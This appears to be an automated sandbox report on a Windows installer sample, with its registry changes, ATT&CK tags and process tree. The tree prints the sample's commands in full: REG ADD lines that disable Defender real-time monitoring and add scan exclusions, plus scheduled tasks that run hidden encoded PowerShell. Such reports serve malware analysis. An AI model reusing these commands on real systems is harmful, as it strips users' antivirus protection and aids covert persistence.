Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0082000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	GUgpQsE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B399D80D-B323-4625-BCC4-AA785318AF66}\WpadDecision = "0"	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-86-e9-9c-c5-4e	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{B399D80D-B323-4625-BCC4-AA785318AF66}\WpadDecisionTime = 006ad8d88234db01	GUgpQsE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	GUgpQsE.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-86-e9-9c-c5-4e\WpadDecision = "0"	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	GUgpQsE.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	GUgpQsE.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0082000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	GUgpQsE.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	GUgpQsE.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2928	schtasks.exe
2776	schtasks.exe
2940	schtasks.exe
2824	schtasks.exe
1884	schtasks.exe
3056	schtasks.exe
3052	schtasks.exe
2380	schtasks.exe
2612	schtasks.exe
2228	schtasks.exe
2640	schtasks.exe
1468	schtasks.exe
1836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEGUgpQsE.exe

pid	process
2752	powershell.EXE
2752	powershell.EXE
2752	powershell.EXE
676	powershell.EXE
676	powershell.EXE
676	powershell.EXE
2528	powershell.EXE
2528	powershell.EXE
2528	powershell.EXE
1600	powershell.EXE
1600	powershell.EXE
1600	powershell.EXE
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe
928	GUgpQsE.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2752	powershell.EXE
Token: SeDebugPrivilege	676	powershell.EXE
Token: SeDebugPrivilege	2528	powershell.EXE
Token: SeDebugPrivilege	1600	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2268 wrote to memory of 2288	2268	9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe	Install.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 3044	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 2288 wrote to memory of 1744	2288	Install.exe	forfiles.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 3044 wrote to memory of 2296	3044	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 1744 wrote to memory of 2808	1744	forfiles.exe	cmd.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2932	2808	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2900	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2808 wrote to memory of 2228	2808	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2296 wrote to memory of 2828	2296	cmd.exe	reg.exe
PID 2288 wrote to memory of 2824	2288	Install.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
"C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Users\Admin\AppData\Local\Temp\7zS9B46.tmp\Install.exe
  .\Install.exe /S /site_id "525403"
  2⤵
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\SysWOW64\cmd.exe
      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2296
    - - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2900
    - - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        5⤵
        
        PID:2828
- - C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
    3⤵
    - Indirect Command Execution
    - Suspicious use of WriteProcessMemory
    PID:1744
  - - C:\Windows\SysWOW64\cmd.exe
      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2808
    - - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2932
    - - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2228
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gBaUAFyGj" /SC once /ST 17:51:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2824
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gBaUAFyGj"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gBaUAFyGj"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe\" q8 /site_id 525403 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:2640

C:\Windows\system32\taskeng.exe
taskeng.exe {41965AA1-83FD-4B86-B789-F93F26497EC6} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
1⤵
PID:1892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:676
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2440
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1600
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2912

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2316

C:\Windows\system32\taskeng.exe
taskeng.exe {70247DA3-6C39-4EBC-855B-0EFB3E8019D6} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2320
- C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe
  C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\FjXcTia.exe q8 /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  PID:1984
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gejFPWVdX" /SC once /ST 10:36:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1884
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gejFPWVdX"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1840
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gejFPWVdX"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1064
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1304
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2124
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:2992
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gkCmkKzew" /SC once /ST 12:14:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1468
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gkCmkKzew"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1932
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gkCmkKzew"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2880
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2252
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:3048
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2800
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2824
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:804
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2364
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2376
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\YSrBLfWUtIHnuviW\oafJjutu\uCLzMqtKLlfsPnpP.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:320
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2752
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2280
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2580
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1596
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2560
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2416
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2056
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1168
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2640
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:940
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2088
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1000
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1076
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2132
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
